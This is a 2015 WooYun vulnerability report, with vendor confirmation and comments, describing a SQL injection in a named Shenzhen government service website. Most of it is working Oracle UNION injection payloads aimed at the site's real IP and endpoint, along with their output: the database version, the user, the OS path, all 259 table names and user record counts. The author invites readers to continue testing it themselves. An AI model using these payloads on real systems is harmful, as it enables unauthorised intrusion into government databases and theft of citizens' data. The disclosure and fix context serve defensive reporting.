当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128168

漏洞标题:深圳市行政服务大厅官网一处POST注入(Oracle Union纯手工测试技巧)

相关厂商:深圳市行政服务大厅

漏洞作者: goubuli

提交时间:2015-07-21 17:34

修复时间:2015-09-06 14:24

公开时间:2015-09-06 14:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-23: 厂商已经确认,细节仅向厂商公开
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

RT
手工演示。。。

详细说明:

深圳市行政服务大厅网上办事系统的办事状态查询
URL:

http://61.144.227.35/main/gb/adminhall/szzwresult.jsp


POST:

field2=201502163000016


输入任意数据的时候提示出错,回执编号可以在首页上面看到,如图:

0721_0.png


正常POST访问页面为:

0721_8.png


工具没跑出数据来。。。只能手工。。。。
看截图:

0721_11.png


下面手工测试:
判断数据库,在一番测试后最后判定是Oracle,判断数据:

field2=201502163000016' and  0<>(select count(*) from dual) --


判断字段长度,提交:

field2=201502163000016' order by 17--

页面正常。。。
直接union,由于oracle的字段敏感性,类型必须一一对应,只能提交:

field2=201502163000016' UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

页面正常
紧接着判断字段,逐一排除,最终提交:

field2=201502163000016'  UNION SELECT '1','2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--

0721_4.png

可用字段:1,5,9
接下来就是直接Union的过程:
1、看看版本:

field2=201502163000016'  UNION SELECT '11'||((select banner from sys.v_$version where rownum=1)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--

0721_5.png


2、看看当前连接用户名:

field2=201502163000016'  UNION SELECT '11'||((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--


3、判断操作系统

field2=201502163000016'  UNION SELECT '11'||((select member from v$logfile where rownum=1)),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from dual--


结果:

H:\ORADATA\SZGOV92\REDO01.LOG

是windows系统。。。
4、表,一共有259张表:

field2=201502163000016' and (select count (*) from user_tables)=259 and 'kKTd'='kKTd

0721_2.png


5、表名:

field2=201502163000016'  UNION SELECT '11'||TABLE_NAME,'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from (select A.*,rownum rn from (select * from USER_TABLES) A where rownum<2) where rn>0--


第一张表:

MEMBER_ACCOUNT


其他表类似。。。
写个程序跑出表,最后出来的表为(259张):

MEMBER_ACCOUNT
MEMBER_ENTERPRISE
MEMBER_MESSAGE
ARTICLESOURCE
ARTICLETOPIC
ARTICLEUSER
ARTICLE_RELATE_WORD
ARTICLE_STAT
BANS_BANNERINFO
BANS_GROUP
BANS_STATE
BBS_ARTICLE
PROFILE_CATALOG
PROFILE_MESSAGE
PROFILE_NOTEBOOK
PROFILE_SETTING
PROFILE_SYSTEM
PROFILE_TYPE
PROFILE_USER
PROFILE_USER_MESSAGE
PUBLISH_CATALOG
RESOURCES
RESOURCES_CONNECTION
RESOURCES_RELATE
RIGHTS_OBJECTS
BBS_BANK
BBS_BOARD
BBS_USER
CATALOG_FILE_OUT
CATALOG_PAGE
CATALOG_PLUGIN
RIGHTS_OPTIONS
RIGHTS_PERMISSIONS
RIGHTS_ROLES
RIGHTS_ROLE_OBJ
RIGHTS_ROLE_USER
RIGHTS_USERS
RIGHTS_USER_ACTIONTIME
RIGHTS_USER_OBJ
RIGHTS_USER_SHARE
RIGHTS_USER_TRANSFER
SERVICE
SETTING
SIGNS
SIGN_TYPE
SITE
CATALOG_RELATION
SITE_MENUBAR
SITE_STAT
SITE_STATE
SITE_TEMPLATE
SITE_TEMPLATE_PROFILE
SITE_USER
STAT_DAY
STAT_FADDRESS
STAT_FAREA
STAT_FBROWSER
STAT_FIP
STAT_FIPONE
STAT_FIPTWO
STAT_FMOZILLA
STAT_FREFER
STAT_FSCREEN
STAT_FSYSTEM
STAT_FVISIT
STAT_FWEBURL
STAT_INFOLIST
STAT_IPINFO
STAT_IPSCOPE
STAT_MONTH
STAT_STATDAY
STAT_STATMONTH
STAT_STATWEEK
STAT_STATYEAR
EXCHANGE_TEMP_CK
EXCHANGE_TEMP_DTFBXX
EXCHANGE_TEMP_DW
FEEDBACK
FEEDBACK_TYPE
HOMEPAGE_CATALOG
HOT_CATALOG
INQUIRY_ANSWER_COUNT
INQUIRY_QUESTION
INQUIRY_QUESTION_ANSWER
INQUIRY_QUESTION_TYPE
INQUIRY_TOME
INQUIRY_TOME_QUESTION
INQUIRY_USER
INQUIRY_USER_ANSWER
INQUIRY_USER_ANSWER_BAK
INQUIRY_USER_RESULT
LAW
LIBRARY_INFOSTYLE
LIBRARY_ITEM
LIBRARY_TABLEINFO
EXCHANGE_IN_HIST_EMAIL_DTFBXX
EXCHANGE_IN_MYDDCWT
EXCHANGE_IN_MYDDCXZSM
EXCHANGE_IN_TEMP_CK
EXCHANGE_IN_TEMP_CKSX
EXCHANGE_IN_TEMP_DTFBXX
EXCHANGE_IN_TEMP_DW
EXCHANGE_IN_TEMP_EMAIL_BJZT
EXCHANGE_IN_TEMP_EMAIL_DTFBXX
EXCHANGE_LAW
EXCHANGE_LAW_BAK
EXCHANGE_LAW_CATALOG
EXCHANGE_MYDDCXZSM
EXCHANGE_ORGANIZATION_BAK
EXCHANGE_RESOURCES_CONNECTION
EXCHANGE_TEMP_BLSX
EXCHANGE_ORGANIZATION
YWTJ
XZXKBLJG
LAW_NEW
EXCHANGE_TEMP_BJZT_NEW
EXCHANGE_TEMP_DTFBXX_NEW
EXCHANGE_IN_TEMP_BJZT_0426
EXCHANGE_IN_TEMP_BJZT
DOCUMENT
DOCUMENT_UPLOAD
EMAGAZINE
EMAG_ARTICLE
EMAG_COLUMN
EMAG_ISSUE
EMAG_ISSUE_COLUMN
EVENTLOG
EXCHANGE_DCDA
EXCHANGE_DEAL
WUBIN
TEMP_TOTALCNT
TEMP_IN_TOTALCNT
EXCHANGE_DEAL_CATALOG
EXCHANGE_FILE
EXCHANGE_IN_DCDA
EXCHANGE_IN_HIST_EMAIL_BJZT
BBS_CATALOG
BBS_IP
BBS_KEYWORD
BBS_NOTICE
BBS_REPLY_MAN
BUILD_TEMPLATE
CASES
CASE_REPLY
CASE_TRADE
CASE_USER
CATALOG
CATALOG_FILE
CATALOG_USER
CT
DEAL
DECLARES
DECLARE_STATE
DICTIONARY
DICTIONARY_TYPE
ARTICLE
ARTICLEFOLDER
ARTICLEKEYWORD
ARTICLEREAD
ARTICLEREJECT
ARTICLEVIEW
BANNER_TYPE
BANS_BANNERSTATS
BANS_DAYSTATS
BANS_DEFAULT_BANNER
EXCHANGE_TEMP_CKSX
T_ERRORMSG
USER_DEPT
USER_DOC_SHARE
USER_GROUP
USER_GROUP_MEMBER
USER_ONLINE
EXCHANGE_TEMP_BJZT
TEMP1
COMPLAIN
DEAL_TEST
DEAL2
EXCHANGE_IN_TEMP_BLSX
SUGGESTION_ROLE
SUGGESTION_ZXWY
SURVEYANSWERS
SURVEYLOGSCOOKIE
SURVEYLOGSIP
SURVEYQUESTIONS
SURVEYQUESTIONS_KIND
TAB_96666BOX
TAB_DEPBRANCH
TAB_DEPINFO
TAB_DEPINFO2
TAB_LEADERINFO
TAB_STAFFINFO
TAB_UP_BRANCH
TEMPLATE
TEMPLATE_BAK
TEMPLATE_CATALOG
TEMPLATE_CATALOG_NOUSE
TEMPLATE_LIB_NOUSE
TEMPLATE_WEBPART
TOURIST_ARTICLE
MEMBER_MESSAGE_OWNER
MEMBER_PERSON
MEMBER_PROFILE
MEMBER_PROFILE_CATALOG
MEMBER_SIGNUP
MEMBER_TYPE
MESSAGE
MESSAGE_TYPE
NET_APPLY
NET_ARTICLE
NET_ARTICLE_TYPE
NORMALINFO_LIST
NORMALINFO_LISTTYPE
ONLINEUSER
OPTION_REPLY
OPTION_TITLE
PHOTO_LIB
PHOTO_TYPE
PLAN_TABLE
PLUGIN
PLUGIN_PROFILE
PORTAL_USER
PROCDESCRIP
PROFILE
STAT_VISITOR
STAT_VISITTIME
STAT_WEEK
STAT_YEAR
SUGGESTION
SUGGESTION_AUTHDEPTCOMMENT
SUGGESTION_CATAGORY
SUGGESTION_CLERKINFO
SUGGESTION_COMMISSARY
SUGGESTION_COMMISSARYINFO
SUGGESTION_DEPARTMENTINFO
SUGGESTION_DEPARTMENTTYPE
SUGGESTION_FILETYPE
SUGGESTION_HISTORY
SUGGESTION_RDDB
EXCHANGE_MYDDCWT
EXCHANGE_RESOURCES_CON_BAK
LIBRARY_TYPE
LINK
LINK_TYPE
LIVE_ARTICLE
LIVE_ROLE
LIVE_TOPIC
LIVE_WORD
MAILBOX_ARTICLE
MAILBOX_ARTICLE_OPERATOR
MAILBOX_FLOW
MAILBOX_FLOW_OPERATOR
MAILBOX_FLOW_PROCESS
MAILBOX_OPERATION
MAILBOX_RIGHT
MAILBOX_TYPE
MAILLIST
MAILLISTMSG
MAILLISTMSGHIS
MAILLISTSUBSCRIBE


6、看看表里记录条数:

field2=201502163000016'  UNION SELECT '11'||count(*),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from INQUIRY_USER--


0721_10.png

5397条记录


提交:

field2=201502163000016'  UNION SELECT '11'||count(*),'2','3','4','5','6','7','8','9',10,11,12,'13','14','15',null,'17' from EXCHANGE_IN_TEMP_BJZT--


0721_12.png

6313588条记录


好了。。。到此吧
其他信息不跑了。。。你们自己测吧。。。

漏洞证明:

0721_2.png

0721_4.png

0721_5.png

0721_10.png

0721_12.png

声明:未做任何破坏性操作!

修复方案:

过滤参数
加WAF

版权声明:转载请注明来源 goubuli@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-23 14:23

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-21 17:34 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    手工注射吊吊的

  2. 2015-07-21 18:47 | tnt1200 ( 普通白帽子 | Rank:121 漏洞数:17 | 关注飞机安全....)

    手工注射吊吊的

  3. 2015-07-21 20:54 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    dba?

  4. 2015-07-21 21:11 | goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )

    @tnt1200 tnt大牛

  5. 2015-07-21 21:11 | goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )

    @HackBraid 没搞到shell

  6. 2015-09-06 15:06 | 老实先生 ( 路人 | Rank:7 漏洞数:4 | 早日告别路人状态)

    手工注射吊吊的

  7. 2015-09-06 15:25 | 土夫子 ( 普通白帽子 | Rank:173 漏洞数:41 | 逆流而上,顺势而为)

    @疯狗 狗哥求审 http://wooyun.org/bugs/wooyun-2015-0139280/trace/78141822290d425c0bc3b3a882103775

  8. 2015-09-06 21:13 | Soulmk ( 路人 | Rank:6 漏洞数:2 | 我是来学习滴~~)

    手工注射吊吊的